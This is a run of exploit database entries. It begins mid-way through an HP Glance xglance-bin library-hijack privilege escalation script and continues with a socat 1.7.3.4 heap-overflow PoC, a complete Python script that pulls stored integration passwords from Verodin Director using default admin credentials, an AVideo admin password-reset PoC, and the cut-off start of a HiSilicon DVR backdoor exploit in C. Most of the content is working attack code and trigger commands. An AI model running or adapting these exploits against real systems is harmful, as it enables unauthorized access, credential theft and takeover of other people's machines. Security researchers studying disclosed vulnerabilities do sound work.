int _XmTextToggleCursorGC = 0;
int _XmTextToLocaleText = 0;
int _XmTextUpdateLineTable = 0;
int _XmTextValidate = 0;
int _XmTextValueChanged = 0;
int xmTextWidgetClass = 0;
int XmTextXYToPos = 0;
int _XmToggleBCacheCompare = 0;
int _XmToggleB_defaultTranslations = 0;
int _XmToggleBGadClassExtRec = 0;
int _XmToggleB_menuTranslations = 0;
int _XmToggleBPrimClassExtRec = 0;
int xmToggleButtonClassRec = 0;
int xmToggleButtonGadgetClass = 0;
int xmToggleButtonGadgetClassRec = 0;
int XmToggleButtonGadgetGetState = 0;
int XmToggleButtonGadgetSetState = 0;
int XmToggleButtonGadgetSetValue = 0;
int xmToggleButtonGCacheObjClassRec = 0;
int XmToggleButtonGetState = 0;
int XmToggleButtonSetState = 0;
int XmToggleButtonSetValue = 0;
int xmToggleButtonWidgetClass = 0;
int _XmToHorizontalPixels = 0;
int _XmToLayoutDirection = 0;
int _XmToolTipEnter = 0;
int XmToolTipGetLabel = 0;
int _XmToolTipLeave = 0;
int _XmToolTipRemove = 0;
int _XmToPanedPixels = 0;
int _XmTopShadowColorDefault = 0;
int _XmTopShadowPixmapDefault = 0;
int _XmToVerticalPixels = 0;
int XmTrackingEvent = 0;
int XmTrackingLocate = 0;
int _XmTrackShellFocus = 0;
int XmTransferDone = 0;
int _XmTransferGetDestinationCBStruct = 0;
int XmTransferSendRequest = 0;
int XmTransferSetParameters = 0;
int XmTransferStartRequest = 0;
int XmTransferValue = 0;
int _XmTransformSubResources = 0;
int XmTranslateKey = 0;
int _XmTraverse = 0;
int _XmTraverseAway = 0;
int _XmTraverseDown = 0;
int _XmTraverseHome = 0;
int _XmTraverseLeft = 0;
int _XmTraverseNext = 0;
int _XmTraverseNextTabGroup = 0;
int _XmTraversePrev = 0;
int _XmTraversePrevTabGroup = 0;
int _XmTraverseRight = 0;
int _XmTraverseUp = 0;
int _XmTravGraphAdd = 0;
int _XmTravGraphRemove = 0;
int _XmTravGraphUpdate = 0;
int xmTreeClassRec = 0;
int xmTreeWidgetClass = 0;
int XmuNCopyISOLatin1Lowered = 0;
int _XmUnhighlightBorder = 0;
int XmUninstallImage = 0;
int _XmUnitTypeDefault = 0;
int XmUpdateDisplay = 0;
int _XmUseColorObj = 0;
int xmUseVersion = 0;
int _XmUtf8ToUcs2 = 0;
int _XmUtilIsSubclassByNameQ = 0;
int XmVaCreateArrowButton = 0;
int XmVaCreateArrowButtonGadget = 0;
int XmVaCreateBulletinBoard = 0;
int XmVaCreateButtonBox = 0;
int XmVaCreateCascadeButton = 0;
int XmVaCreateCascadeButtonGadget = 0;
int XmVaCreateColorSelector = 0;
int XmVaCreateColumn = 0;
int XmVaCreateCombinationBox2 = 0;
int XmVaCreateComboBox = 0;
int XmVaCreateCommand = 0;
int XmVaCreateContainer = 0;
int XmVaCreateDataField = 0;
int XmVaCreateDrawingArea = 0;
int XmVaCreateDrawnButton = 0;
int XmVaCreateDropDown = 0;
int XmVaCreateExt18List = 0;
int XmVaCreateFileSelectionBox = 0;
int XmVaCreateForm = 0;
int XmVaCreateFrame = 0;
int XmVaCreateIconGadget = 0;
int XmVaCreateLabel = 0;
int XmVaCreateLabelGadget = 0;
int XmVaCreateList = 0;
int XmVaCreateMainWindow = 0;
int XmVaCreateManagedArrowButton = 0;
int XmVaCreateManagedArrowButtonGadget = 0;
int XmVaCreateManagedBulletinBoard = 0;
int XmVaCreateManagedButtonBox = 0;
int XmVaCreateManagedCascadeButton = 0;
int XmVaCreateManagedCascadeButtonGadget = 0;
int XmVaCreateManagedColorSelector = 0;
int XmVaCreateManagedColumn = 0;
int XmVaCreateManagedCombinationBox2 = 0;
int XmVaCreateManagedComboBox = 0;
int XmVaCreateManagedCommand = 0;
int XmVaCreateManagedContainer = 0;
int XmVaCreateManagedDataField = 0;
int XmVaCreateManagedDrawingArea = 0;
int XmVaCreateManagedDrawnButton = 0;
int XmVaCreateManagedDropDown = 0;
int XmVaCreateManagedExt18List = 0;
int XmVaCreateManagedFileSelectionBox = 0;
int XmVaCreateManagedForm = 0;
int XmVaCreateManagedFrame = 0;
int XmVaCreateManagedIconGadget = 0;
int XmVaCreateManagedLabel = 0;
int XmVaCreateManagedLabelGadget = 0;
int XmVaCreateManagedList = 0;
int XmVaCreateManagedMainWindow = 0;
int XmVaCreateManagedMessageBox = 0;
int XmVaCreateManagedMultiList = 0;
int XmVaCreateManagedNotebook = 0;
int XmVaCreateManagedPanedWindow = 0;
int XmVaCreateManagedPushButton = 0;
int XmVaCreateManagedPushButtonGadget = 0;
int XmVaCreateManagedRowColumn = 0;
int XmVaCreateManagedScale = 0;
int XmVaCreateManagedScrollBar = 0;
int XmVaCreateManagedScrolledWindow = 0;
int XmVaCreateManagedSelectionBox = 0;
int XmVaCreateManagedSeparator = 0;
int XmVaCreateManagedSeparatorGadget = 0;
int XmVaCreateManagedSimpleSpinBox = 0;
int XmVaCreateManagedSpinBox = 0;
int XmVaCreateManagedTabStack = 0;
int XmVaCreateManagedText = 0;
int XmVaCreateManagedTextField = 0;
int XmVaCreateManagedToggleButton = 0;
int XmVaCreateManagedToggleButtonGadget = 0;
int XmVaCreateMessageBox = 0;
int XmVaCreateMultiList = 0;
int XmVaCreateNotebook = 0;
int XmVaCreatePanedWindow = 0;
int XmVaCreatePushButton = 0;
int XmVaCreatePushButtonGadget = 0;
int XmVaCreateRowColumn = 0;
int XmVaCreateScale = 0;
int XmVaCreateScrollBar = 0;
int XmVaCreateScrolledWindow = 0;
int XmVaCreateSelectionBox = 0;
int XmVaCreateSeparator = 0;
int XmVaCreateSeparatorGadget = 0;
int XmVaCreateSimpleCheckBox = 0;
int XmVaCreateSimpleMenuBar = 0;
int XmVaCreateSimpleOptionMenu = 0;
int XmVaCreateSimplePopupMenu = 0;
int XmVaCreateSimplePulldownMenu = 0;
int XmVaCreateSimpleRadioBox = 0;
int XmVaCreateSimpleSpinBox = 0;
int XmVaCreateSpinBox = 0;
int XmVaCreateTabStack = 0;
int XmVaCreateText = 0;
int XmVaCreateTextField = 0;
int XmVaCreateToggleButton = 0;
int XmVaCreateToggleButtonGadget = 0;
int _XmValidateFocus = 0;
int _XmValidCursorIconQuark = 0;
int _XmValidTimestamp = 0;
int _XmVaToTypedArgList = 0;
int _XmVendorExtRealize = 0;
int xmVendorShellExtClassRec = 0;
int xmVendorShellExtObjectClass = 0;
int _XmVersionString = 0;
int _XmVirtKeys_acornFallbackBindingString = 0;
int _XmVirtKeys_apolloFallbackBindingString = 0;
int _XmVirtKeys_dblclkFallbackBindingString = 0;
int _XmVirtKeys_decFallbackBindingString = 0;
int _XmVirtKeysDestroy = 0;
int _XmVirtKeys_dgFallbackBindingString = 0;
int _XmVirtKeys_fallbackBindingString = 0;
int _XmVirtKeysHandler = 0;
int _XmVirtKeys_hpFallbackBindingString = 0;
int _XmVirtKeys_ibmFallbackBindingString = 0;
int _XmVirtKeys_ingrFallbackBindingString = 0;
int _XmVirtKeysInitialize = 0;
int _XmVirtKeysLoadFallbackBindings = 0;
int _XmVirtKeysLoadFileBindings = 0;
int _XmVirtKeys_megatekFallbackBindingString = 0;
int _XmVirtKeys_motorolaFallbackBindingString = 0;
int _XmVirtKeys_sgiFallbackBindingString = 0;
int _XmVirtKeys_siemens9733FallbackBindingString = 0;
int _XmVirtKeys_siemensWx200FallbackBindingString = 0;
int _XmVirtKeys_sunFallbackBindingString = 0;
int _XmVirtKeys_tekFallbackBindingString = 0;
int _XmVirtualToActualKeysym = 0;
int _XmWarning = 0;
int _XmWarningMsg = 0;
int _XmWhitePixel = 0;
int _XmWidgetFocusChange = 0;
int XmWidgetGetBaselines = 0;
int XmWidgetGetDisplayRect = 0;
int _XmWidgetIsTraversable = 0;
int xmWorldClass = 0;
int xmWorldClassRec = 0;
int xmWorldObjectClass = 0;
int _XmWriteDragBuffer = 0;
int _XmWriteDSToStream = 0;
int _XmWriteInitiatorInfo = 0;
int _XmXftDrawCreate = 0;
int _XmXftDrawDestroy = 0;
int _XmXftDrawString = 0;
int _XmXftDrawString2 = 0;
int _XmXftFontAverageWidth = 0;
int _XmXftGetXftColor = 0;
int _XmXftSetClipRectangles = 0;
int _Xmxpmatoui = 0;
int _XmxpmColorKeys = 0;
int _XmxpmCreateImageFromPixmap = 0;
int _XmxpmCreatePixmapFromImage = 0;
int _XmxpmDataTypes = 0;
int _XmxpmFreeColorTable = 0;
int _XmxpmFreeRgbNames = 0;
int _XmxpmGetCmt = 0;
int _XmxpmGetRgbName = 0;
int _XmxpmGetString = 0;
int _XmxpmHashIntern = 0;
int _XmxpmHashSlot = 0;
int _XmxpmHashTableFree = 0;
int _XmxpmHashTableInit = 0;
int _XmxpmInitAttributes = 0;
int _XmxpmInitXpmImage = 0;
int _XmxpmInitXpmInfo = 0;
int _XmxpmNextString = 0;
int _XmxpmNextUI = 0;
int _XmxpmNextWord = 0;
int _XmxpmParseColors = 0;
int _XmxpmParseData = 0;
int _XmxpmParseDataAndCreate = 0;
int _XmxpmParseExtensions = 0;
int _XmxpmParseHeader = 0;
int _XmxpmParseValues = 0;
int _XmxpmReadRgbNames = 0;
int _XmxpmSetAttributes = 0;
int _XmxpmSetInfo = 0;
int _XmxpmSetInfoMask = 0;
int _Xmxpm_xynormalizeimagebits = 0;
int _Xmxpm_znormalizeimagebits = 0;
int XNextEvent = 0;
int XOffsetRegion = 0;
int XOMOfOC = 0;
int XOpenDisplay = 0;
int XOpenIM = 0;
int XParseColor = 0;
int XPeekEvent = 0;
int XPending = 0;
int Xpms_popen = 0;
int XPolygonRegion = 0;
int XPutBackEvent = 0;
int XPutImage = 0;
int XQueryBestCursor = 0;
int XQueryColor = 0;
int XQueryColors = 0;
int XQueryPointer = 0;
int XQueryTree = 0;
int XRaiseWindow = 0;
int XReadBitmapFileData = 0;
int XRecolorCursor = 0;
int XRectInRegion = 0;
int XReparentWindow = 0;
int XrmCombineDatabase = 0;
int XrmDestroyDatabase = 0;
int XrmGetStringDatabase = 0;
int XrmPermStringToQuark = 0;
int XrmPutResource = 0;
int XrmPutStringResource = 0;
int XrmQGetResource = 0;
int XrmQGetSearchList = 0;
int XrmQGetSearchResource = 0;
int XrmQuarkToString = 0;
int XrmStringToQuark = 0;
int XrmUniqueQuark = 0;
int XRotateBuffers = 0;
int XSaveContext = 0;
int XScreenCount = 0;
int XScreenNumberOfScreen = 0;
int XScreenOfDisplay = 0;
int XSelectInput = 0;
int XSendEvent = 0;
int XSetClipMask = 0;
int XSetClipOrigin = 0;
int XSetClipRectangles = 0;
int XSetCloseDownMode = 0;
int XSetErrorHandler = 0;
int XSetFillStyle = 0;
int XSetForeground = 0;
int XSetFunction = 0;
int XSetICFocus = 0;
int XSetICValues = 0;
int XSetInputFocus = 0;
int XSetLineAttributes = 0;
int XSetLocaleModifiers = 0;
int XSetOCValues = 0;
int XSetRegion = 0;
int XSetSelectionOwner = 0;
int XSetStipple = 0;
int XSetTextProperty = 0;
int XSetTSOrigin = 0;
int XSetWindowBackground = 0;
int XSetWindowBackgroundPixmap = 0;
int XSetWMColormapWindows = 0;
int XShapeCombineMask = 0;
int XShapeCombineRectangles = 0;
int XShapeQueryExtension = 0;
int __xstat64 = 0;
int XStoreBuffer = 0;
int XStoreColor = 0;
int XStringToKeysym = 0;
int XSubtractRegion = 0;
int XSync = 0;
int XtAddCallback = 0;
int XtAddEventHandler = 0;
int XtAddGrab = 0;
int XtAddRawEventHandler = 0;
int XtAllocateGC = 0;
int XtAppAddTimeOut = 0;
int XtAppAddWorkProc = 0;
int XtAppCreateShell = 0;
int XtAppErrorMsg = 0;
int XtAppGetExitFlag = 0;
int XtAppGetSelectionTimeout = 0;
int XtAppLock = 0;
int XtAppNextEvent = 0;
int XtAppPending = 0;
int XtAppProcessEvent = 0;
int XtAppSetSelectionTimeout = 0;
int XtAppSetTypeConverter = 0;
int XtAppSetWarningMsgHandler = 0;
int XtAppUnlock = 0;
int XtAppWarningMsg = 0;
int XtAugmentTranslations = 0;
int XtBuildEventMask = 0;
int XtCallActionProc = 0;
int XtCallCallbackList = 0;
int XtCallCallbacks = 0;
int XtCallConverter = 0;
int XtCalloc = 0;
int XtCancelSelectionRequest = 0;
int XtConfigureWidget = 0;
int XtConvertAndStore = 0;
int XtConvertCase = 0;
int XtCreateManagedWidget = 0;
int XtCreatePopupShell = 0;
int XtCreateSelectionRequest = 0;
int XtCreateWidget = 0;
int XtCreateWindow = 0;
int XtCvtStringToFontSet = 0;
int XtCvtStringToFontStruct = 0;
int XtCvtStringToPixel = 0;
int XtDatabase = 0;
int XtDestroyApplicationContext = 0;
int XtDestroyWidget = 0;
int XtDisownSelection = 0;
int XtDispatchEvent = 0;
int XtDisplayOfObject = 0;
int XtDisplayStringConversionWarning = 0;
int XtDisplayToApplicationContext = 0;
int XtError = 0;
int XtErrorMsg = 0;
int XTextExtents = 0;
int XTextExtents16 = 0;
int XTextWidth = 0;
int XTextWidth16 = 0;
int XtFree = 0;
int XtGetActionKeysym = 0;
int XtGetApplicationNameAndClass = 0;
int XtGetApplicationResources = 0;
int XtGetConstraintResourceList = 0;
int XtGetErrorDatabaseText = 0;
int XtGetGC = 0;
int XtGetKeysymTable = 0;
int XtGetMultiClickTime = 0;
int XtGetResourceList = 0;
int XtGetSelectionParameters = 0;
int XtGetSelectionRequest = 0;
int XtGetSelectionValue = 0;
int XtGetSelectionValueIncremental = 0;
int XtGetSelectionValues = 0;
int XtGetSelectionValuesIncremental = 0;
int XtGetSubresources = 0;
int XtGetSubvalues = 0;
int XtGetValues = 0;
int XtGrabButton = 0;
int XtGrabKey = 0;
int XtGrabKeyboard = 0;
int XtGrabPointer = 0;
int XtHasCallbacks = 0;
int _XtInherit = 0;
int _XtInheritTranslations = 0;
int XtInitializeWidgetClass = 0;
int XtInsertEventHandler = 0;
int XtInstallAccelerators = 0;
int XtIsManaged = 0;
int XtIsSensitive = 0;
int XtIsSubclass = 0;
int _XtIsSubclassOf = 0;
int XtLastEventProcessed = 0;
int XtLastTimestampProcessed = 0;
int XtMakeGeometryRequest = 0;
int XtMakeResizeRequest = 0;
int XtMalloc = 0;
int XtManageChild = 0;
int XtManageChildren = 0;
int XtMergeArgLists = 0;
int XtMoveWidget = 0;
int XtName = 0;
int XtNameToWidget = 0;
int XtOverrideTranslations = 0;
int XtOwnSelection = 0;
int XtOwnSelectionIncremental = 0;
int XtParseAcceleratorTable = 0;
int XtParseTranslationTable = 0;
int XtPopdown = 0;
int XtPopup = 0;
int XtProcessLock = 0;
int XtProcessUnlock = 0;
int XtQueryGeometry = 0;
int XTranslateCoordinates = 0;
int XtRealizeWidget = 0;
int XtRealloc = 0;
int XtRegisterGrabAction = 0;
int XtReleaseGC = 0;
int XtRemoveAllCallbacks = 0;
int XtRemoveCallback = 0;
int XtRemoveEventHandler = 0;
int XtRemoveGrab = 0;
int XtRemoveTimeOut = 0;
int XtRemoveWorkProc = 0;
int XtResizeWidget = 0;
int XtResolvePathname = 0;
int XtScreenDatabase = 0;
int XtScreenOfObject = 0;
int XtSendSelectionRequest = 0;
int XtSetKeyboardFocus = 0;
int XtSetKeyTranslator = 0;
int XtSetMappedWhenManaged = 0;
int XtSetSelectionParameters = 0;
int XtSetSensitive = 0;
int XtSetSubvalues = 0;
int XtSetTypeConverter = 0;
int XtSetValues = 0;
int XtShellStrings = 0;
int XtStrings = 0;
int XtTranslateCoords = 0;
int XtTranslateKey = 0;
int XtUngrabButton = 0;
int XtUngrabKey = 0;
int XtUngrabKeyboard = 0;
int XtUngrabPointer = 0;
int XtUnmanageChild = 0;
int XtUnmanageChildren = 0;
int XtVaCreateManagedWidget = 0;
int XtVaCreateWidget = 0;
int XtVaGetValues = 0;
int XtVaSetValues = 0;
int XtWarning = 0;
int XtWarningMsg = 0;
int XtWidgetToApplicationContext = 0;
int XtWindowOfObject = 0;
int XtWindowToWidget = 0;
int XUngrabKeyboard = 0;
int XUngrabPointer = 0;
int XUngrabServer = 0;
int XUnionRectWithRegion = 0;
int XUnionRegion = 0;
int XUnmapWindow = 0;
int XUnsetICFocus = 0;
int Xutf8DrawImageString = 0;
int Xutf8DrawString = 0;
int Xutf8TextEscapement = 0;
int Xutf8TextExtents = 0;
int Xutf8TextListToTextProperty = 0;
int XVaCreateNestedList = 0;
int XWarpPointer = 0;
int XwcDrawImageString = 0;
int XwcDrawString = 0;
int XwcTextEscapement = 0;
int XwcTextExtents = 0;
int XWidthOfScreen = 0;
int XWindowEvent = 0;
int XWithdrawWindow = 0;
int overrideShellWidgetClass = 0;

DONE

echo "[+] Compiling the code..."
/usr/bin/gcc -fPIC -shared -static-libgcc -o libXm.so.3 lib.c

echo "[+] Cleaning up..."
/bin/rm -f lib.c 

mkdir -p ./-L/lib64
mv libXm.so.3 ./-L/lib64
cd ./-L/lib64
ln -s libXm.so.3 libXp.so.6
ln -s libXm.so.3 libXt.so.6
cd ../../

echo "[+] Attempting to exploit the xglance-bin: "

/opt/perf/bin/xglance-bin
            
# Exploit Title: Socat 1.7.3.4 - Heap Based Overflow (PoC)
# Date: 2020-02-03
# Exploit Author: hieubl from HPT Cyber Security
# Vendor Homepage: http://www.dest-unreach.org/
# Software Link: http://www.dest-unreach.org/socat/
# Version: 1.7.3.4
# Tested on: Ubuntu 16.04.6 LTS
# CVE :

# Heap-Based Overflow due to Integer Overflow and Lack of PIE mitigation (PoC)

------- [***Description***] -------
The source code of socat.c contains the _socat() function, which has an
integer overflow vulnerability:
int _socat(void) {
    ...
    unsigned char *buff;
    ...
    buff = Malloc(2*socat_opts.bufsiz+1);
    ...
}

After that, the line of code "if ((bytes2 = xiotransfer(sock2,
sock1, &buff, socat_opts.bufsiz, true)) < 0) {" calls the
xiotransfer() function. The xiotransfer() function calls the xioread()
function. Finally, the xioread() function calls the Read() function.

ssize_t xioread(xiofile_t *file, void *buff, size_t bufsiz) {

    ...
    Read(pipe->fd, buff, bufsiz); //[***!!!This line of code leads to Heap-Based Overflow vulnerability***!!!]
    ...
}

In addition, the "Makefile" file does not turn on the Position
Independent Executables (PIE) mitigation (CFLAGS does not contain the
"-pie" flag). By default, Ubuntu 16.04 does not turn on this
mitigation. Consequently, it is easier to exploit the program, and this
may even lead to Remote Code Execution (RCE).
Reference: https://hackerone.com/reports/415272, $100 bounty for Linux
Desktop application slack executable does not use pie / no ASLR

------- [***Download and build***] -------
Download link: http://www.dest-unreach.org/socat/download/socat-1.7.3.4.tar.gz
$ tar xzvf socat-1.7.3.4.tar.gz
$ cd socat-1.7.3.4/
$ ./configure
Modify "Makefile" file: "CFLAGS = -g -O -D_GNU_SOURCE -Wall
-Wno-parentheses $(CCOPTS) $(DEFS) $(CPPFLAGS)" (add "-g" flag for
debugging purpose)
$ make
$ sudo make install

------- [***Proof of Concept***] -------
$ checksec socat
[*] '/home/natsu/temp/socat-1.7.3.4/socat'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    FORTIFY:  Enabled
>>> There is no PIE mitigation!

$ python -c 'print "A"*1000000' > a
$ touch b
$ socat -b9223372036854775888 OPEN:a,readbytes=1000000 OPEN:b,readbytes=1000000

This proof of concept triggers the bugs by setting the buffer size to
0x8000000000000050 (9223372036854775888 in decimal). Therefore, the malloc
size passed to "Malloc(2*socat_opts.bufsiz+1)" is 0x100000000000000a0.
This is equivalent to Malloc(0xa0). The readbytes option ("readbytes=1000000")
controls the size of the read (we cannot read with a size as large as
0x8000000000000050) through these lines of code:

if (pipe->readbytes) {
    if (pipe->actbytes == 0) {
        return 0;
    }
    if (pipe->actbytes < bufsiz) {
        bufsiz = pipe->actbytes;
    }
}

------- [***Crash logs***] -------
*** Error in `socat': free(): invalid next size (normal): 0x000000000106a110 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fc0ee5817e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fc0ee58a37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fc0ee58e53c]
socat[0x407e3f]
socat[0x4084c6]
socat[0x408f7a]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fc0ee52a830]
socat[0x4057a9]
2020/02/04 05:33:00 socat[47233] E exiting on signal 6
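
The size arithmetic described in the socat write-up above, as an added example (not code from socat or from the PoC author): it models the quoted "2*bufsiz+1" expression and the readbytes clamp, next to a checked variant that rejects the wrapping size. The helper names and the 64-bit unsigned buffer-size type are assumptions made for this illustration.

```c
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Assumption: the buffer-size option is a 64-bit unsigned value, matching
   the 0x8000000000000050 figure used in the write-up. */
typedef uint64_t bufsize_t;

/* Size expression as quoted from _socat(). Unsigned arithmetic wraps
   modulo 2^64, so a huge bufsiz yields a tiny allocation size. */
uint64_t alloc_size_unchecked(bufsize_t bufsiz)
{
    return 2 * bufsiz + 1;
}

/* Hardened variant (hypothetical helper): refuse any bufsiz for which
   2*bufsiz+1 cannot be represented, instead of letting it wrap. */
bool alloc_size_checked(bufsize_t bufsiz, uint64_t *out)
{
    if (bufsiz > (UINT64_MAX - 1) / 2)
        return false;
    *out = 2 * bufsiz + 1;
    return true;
}

/* Read length after the readbytes clamp quoted from xioread():
   readbytes == 0 means the option is not set. */
uint64_t read_length(bufsize_t bufsiz, uint64_t readbytes, uint64_t actbytes)
{
    if (readbytes) {
        if (actbytes == 0)
            return 0;
        if (actbytes < bufsiz)
            bufsiz = actbytes;
    }
    return bufsiz;
}

/* Number of bytes a read of `len` would write past an `alloc`-byte buffer. */
uint64_t overrun_bytes(uint64_t alloc, uint64_t len)
{
    return len > alloc ? len - alloc : 0;
}

static void report(const char *label, bufsize_t bufsiz, uint64_t readbytes)
{
    uint64_t alloc = alloc_size_unchecked(bufsiz);
    uint64_t len = read_length(bufsiz, readbytes, readbytes);
    uint64_t checked = 0;
    bool ok = alloc_size_checked(bufsiz, &checked);

    printf("%s: bufsiz=0x%" PRIx64 " alloc=0x%" PRIx64
           " read<=%" PRIu64 " overrun<=%" PRIu64 " checked=%s\n",
           label, bufsiz, alloc, len, overrun_bytes(alloc, len),
           ok ? "accepted" : "rejected");
}

int main(void)
{
    /* A modest buffer size (constructed sample): allocation covers the read. */
    report("normal ", 8192, 1000000);
    /* Value from the write-up: doubling wraps to 0xa0, plus one gives 0xa1,
       while the read length is clamped only by readbytes. */
    report("wrapped", 0x8000000000000050ULL, 1000000);
    return 0;
}
```

The checked variant is the shape of the fix: validate the option before the multiplication, so the allocation size and the later read length can never disagree.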
            
#  Exploit Title: Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)
#  Discovery Date: 2019-01-31
#  Exploit Author: Nolan B. Kennedy (nxkennedy)
#  Vendor Homepage: https://www.verodin.com/
#  Software Link : https://www.verodin.com/demo-request/demo-request-form
#  Tested Versions: v3.5.1.0, v3.5.2.0, v3.5.3.1
#  Tested On: Windows
#  CVE: CVE-2019-10716
#  Vulnerability Type: Sensitive Data Disclosure
###
# Description: Verodin Director's REST API allows authenticated users to query the configuration
#       details, which include credentials, of any of the 50+ possible integrated security tools (e.g. Splunk, ArcSight, Palo Alto, AWS Cloud Trail).
#       Fortunately for attackers, members of 3 out of the 4 user groups in the Director can query this info (Users, Power Users, System Admin). 
#
#       API Request: GET https://<director-ip>/integrations.json
#
# Usage: python3 script.py
#
# Example Output:
#
#       -- VERODIN DIRECTOR WEB CONSOLE < V3.5.4.0 - REMOTE AUTHENTICATED PASSWORD DISCLOSURE (POC) --
#	-- Author: Nolan B. Kennedy (nxkennedy) --
#
#
#       [+] Director Version
#       =====================
#       [*] Detected version 3.5.1.0 is VULNERABLE! :)
#
#
#       [+] Account Permissions
#       ========================
#       [*] "admin@verodin.com" is a member of "System Admin"
#
#
#       [+] Verodin Integrations
#       =========================
#       [*] Product: splunk
#       [*] Username: splunk_svc_acct
#       [*] Misc (may include credentials): [{'scheme': 'https', 'basic': False, 'password': 'Sup3rP@ssw0rd',
#       'port': 8089, 'host': '10.0.0.6', 'username': 'splunk_svc_acct'},
#       {'proxy_hash': None}]
#
#       [*] Product: arcsight
#       [*] Username: arcsight_admin
#       [*] Misc (may include credentials): ['10.0.0.7', 8443, 'https', 'arcsight_admin', 'Sup3rP@ssw0rd',
#       "/All Filters/Personal/integration_user's filters/Verodin Filter", 'Verodin Query Viewer', 60]
#
#       [+] Done!
###

import base64
from distutils.version import LooseVersion
import json
import re
import ssl
from sys import exit
from time import sleep
import urllib.request




verodin_ip = '0.0.0.0'
# Default System Admin creds. Worth a try.
username = 'admin@verodin.com'
password = 'Ver0d!nP@$$'
base_url = 'https://{}'.format(verodin_ip)
fixed_version = '3.5.4.0'


# We'll be making 3 different requests so we need a web handling function
def requests(target, html=False):

        url = base_url + target
        context = ssl._create_unverified_context() # so we don't get an ssl cert error
        req  = urllib.request.Request(url)
        credentials = ('{}:{}'.format(username, password))
        encoded_credentials = base64.b64encode(credentials.encode('ascii'))
        req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii")) # use %s instead of format because errors
        r = urllib.request.urlopen(req, context=context)
        content = r.read().decode('utf-8')
        if r.getcode() == 200:
                # we don't always get a 401 if auth fails
                if 'Cookies need to be enabled' in content: 
                        print('[!] Failed to retrieve data: Credentials incorrect/invalid')
                        print()
                        print('[!] Exiting...')
                        exit(1)
                elif html:
                        blob = content
                else:
                        blob = json.loads(content)
                return blob
        elif r.getcode() == 401:
                print('[!] Failed to retrieve data: Credentials incorrect/invalid')
                print()
                print('[!] Exiting...')
                exit(1)
        else:
                print('[!] ERROR: Status Code {}'.format(r.getcode()))
                exit(1)
                

# Do we have permissions to retrieve the creds? 
def getUserPerms():

	target = '/users/user_prefs.json'
	r = requests(target) # returns a single json dict
	print('\n[+] Account Permissions')
	print('========================')
	group_id = r['user_group_id']
	roles = {'Reporting': 4, 'Users': 3, 'Power Users': 2, 'System Admin': 1}
	for role,value in roles.items():
		if group_id == value:
			print('[*] "{}" is a member of "{}"'.format(username, role))
			print()
			if group_id == 4:
				print('[!] This account does not have sufficient privs. You need "Users" or higher.')
				print()
				print('[!] Exiting...')
				exit(1)
	sleep(0.5)
	

# We need to verify the target Director is running a vulnerable version
def checkVuln():

	target = '/settings/system'
	r = requests(target, html=True)
	field = re.search(r'Director\sVersion:.*', r)
	version = field.group().split('<')[0].split(" ")[2]
	print('\n[+] Director Version')
	print('=====================')
	if LooseVersion(version) < LooseVersion(fixed_version):
		print('[*] Detected version {} is VULNERABLE! :)'.format(version))
		print()
	else:
		print('[!] Detected version {} is not vulnerable. Must be < {}'.format(version, fixed_version))
		print()
		print('[!] Exiting...')
		exit(1)  # stop here; the remaining checks assume a vulnerable version

	sleep(0.5)
	

# Where we parse out any creds or other useful info 
def getLoot():

        target = '/integrations.json'
        r = requests(target)  # a list of json dicts
        print('\n[+] Verodin Integrations')
        print('=========================')
        if not r:
                print('[+] Dang! No integrations configured in this Director :(')
                print()
        else:
                for integration in r:
                        product = integration['package_name'] # constant key
                        misc = integration.get('new_client_args') # we use .get to return a None type if the key doesn't exist
                        user = integration.get('username')
                        passw = integration.get('password')
                        token = integration.get('auth_token')
                        print('[*] Product: {}'.format(product))
                        if user:
                                print('[*] Username: {}'.format(user))
                        if passw:
                                print('[*] Password: {}'.format(passw))
                        if token and token != 'null':  # compare by value; "is not" tests identity
                                print('[*] Auth Token: {}'.format(token))
                        if misc:
                                print('[*] Misc (may include credentials): {}'.format(misc))
                        print()
        sleep(0.5)


def main():

	print('\n-- Verodin Director Web Console < v3.5.4.0 - Remote Authenticated Password Disclosure (PoC) --'.upper())
	print('-- Author: Nolan B. Kennedy (nxkennedy) --')
	print()
	checkVuln()
	getUserPerms()
	getLoot()
	print('[+] Done!')
			
		
if __name__ == '__main__':
	main()
            
# Exploit Title: AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)
# Dork: N/A
# Date: 2020-02-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://avideo.com
# Software Link: https://github.com/WWBN/AVideo
# Version: 8.1
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
# 
................
0	
id	92
user	"admin"
name	"Watch Later"
email	"user@localhost"
password	"bc79a173cc20f0897db1c5b004588db9"
created	"2019-05-16 21:42:42"
modified	"2019-05-16 21:42:42"
isAdmin	1
status	"watch_later"
photoURL	"videos/userPhoto/photo1.png"
lastLogin	"2020-02-03 08:11:08"
recoverPass	"0ce70c7b006c78552fee993adeaafadf"
................
#
# Password recovery can be done using recoverPass.
# http://localhost/[PATH]/recoverPass?user=admin&recoverpass=0ce70c7b006c78552fee993adeaafadf
#
            
# Exploit Title: HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account 
# Dork: N/A
# Date: 2020-02-03
# Exploit Author: Snawoot
# Vendor Homepage: http://www.hisilicon.com
# Product Link: http://www.hisilicon.com/en/Products
# Version: hi3520d
# Tested on: Linux
# CVE: N/A
# References: https://habr.com/en/post/486856/
# References: https://github.com/Snawoot/hisilicon-dvr-telnet
# References: https://github.com/tothi/pwn-hisilicon-dvr#summary

# POC: 
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

typedef unsigned char byte;
typedef unsigned int uint;

byte state[2048] = {0};
byte datum[] = {
    0x20, 0x01, 0x02, 0x03, 0x04, 0x05, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09,
